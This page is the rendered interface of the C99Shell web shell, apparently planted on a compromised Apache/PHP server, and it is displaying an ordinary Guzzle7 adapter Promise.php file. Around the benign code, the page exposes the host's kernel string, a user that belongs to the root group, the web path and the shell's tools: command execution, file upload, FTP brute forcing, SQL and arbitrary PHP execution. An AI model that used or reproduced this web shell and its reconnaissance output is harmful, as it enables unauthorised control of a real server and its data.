!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html_v5_10/vendor/php-http/guzzle7-adapter/src/   drwxr-xr-x
Free 28.55 GB of 117.98 GB (24.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Promise.php (3.63 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
Http\Adapter\Guzzle7;

use 
GuzzleHttp\Exception as GuzzleExceptions;
use 
GuzzleHttp\Promise\PromiseInterface;
use 
Http\Adapter\Guzzle7\Exception\UnexpectedValueException;
use 
Http\Client\Exception as HttplugException;
use 
Http\Promise\Promise as HttpPromise;
use 
Psr\Http\Message\RequestInterface;
use 
Psr\Http\Message\ResponseInterface;

/**
 * Wrapper around Guzzle promises.
 *
 * @author Joel Wurtz <joel.wurtz@gmail.com>
 */
final class Promise implements HttpPromise
{
    
/**
     * @var PromiseInterface
     */
    
private $promise;

    
/**
     * @var string State of the promise
     */
    
private $state;

    
/**
     * @var ResponseInterface
     */
    
private $response;

    
/**
     * @var HttplugException
     */
    
private $exception;

    
/**
     * @var RequestInterface
     */
    
private $request;

    public function 
__construct(PromiseInterface $promiseRequestInterface $request)
    {
        
$this->request $request;
        
$this->state self::PENDING;
        
$this->promise $promise->then(function ($response) {
            
$this->response $response;
            
$this->state self::FULFILLED;

            return 
$response;
        }, function (
$reason) use ($request) {
            
$this->state self::REJECTED;

            if (
$reason instanceof HttplugException) {
                
$this->exception $reason;
            } elseif (
$reason instanceof GuzzleExceptions\GuzzleException) {
                
$this->exception $this->handleException($reason$request);
            } elseif (
$reason instanceof \Throwable) {
                
$this->exception = new HttplugException\TransferException('Invalid exception returned from Guzzle7'0$reason);
            } else {
                
$this->exception = new UnexpectedValueException('Reason returned from Guzzle7 must be an Exception');
            }

            throw 
$this->exception;
        });
    }

    
/**
     * {@inheritdoc}
     */
    
public function then(callable $onFulfilled null, callable $onRejected null)
    {
        return new static(
$this->promise->then($onFulfilled$onRejected), $this->request);
    }

    
/**
     * {@inheritdoc}
     */
    
public function getState()
    {
        return 
$this->state;
    }

    
/**
     * {@inheritdoc}
     */
    
public function wait($unwrap true)
    {
        
$this->promise->wait(false);

        if (
$unwrap) {
            if (
self::REJECTED == $this->getState()) {
                throw 
$this->exception;
            }

            return 
$this->response;
        }
    }

    
/**
     * Converts a Guzzle exception into an Httplug exception.
     *
     * @return HttplugException
     */
    
private function handleException(GuzzleExceptions\GuzzleException $exceptionRequestInterface $request)
    {
        if (
$exception instanceof GuzzleExceptions\ConnectException) {
            return new 
HttplugException\NetworkException($exception->getMessage(), $exception->getRequest(), $exception);
        }

        if (
$exception instanceof GuzzleExceptions\RequestException) {
            
// Make sure we have a response for the HttpException
            
if ($exception->hasResponse()) {
                return new 
HttplugException\HttpException(
                    
$exception->getMessage(),
                    
$exception->getRequest(),
                    
$exception->getResponse(),
                    
$exception
                
);
            }

            return new 
HttplugException\RequestException($exception->getMessage(), $exception->getRequest(), $exception);
        }

        return new 
HttplugException\TransferException($exception->getMessage(), 0$exception);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0034 ]--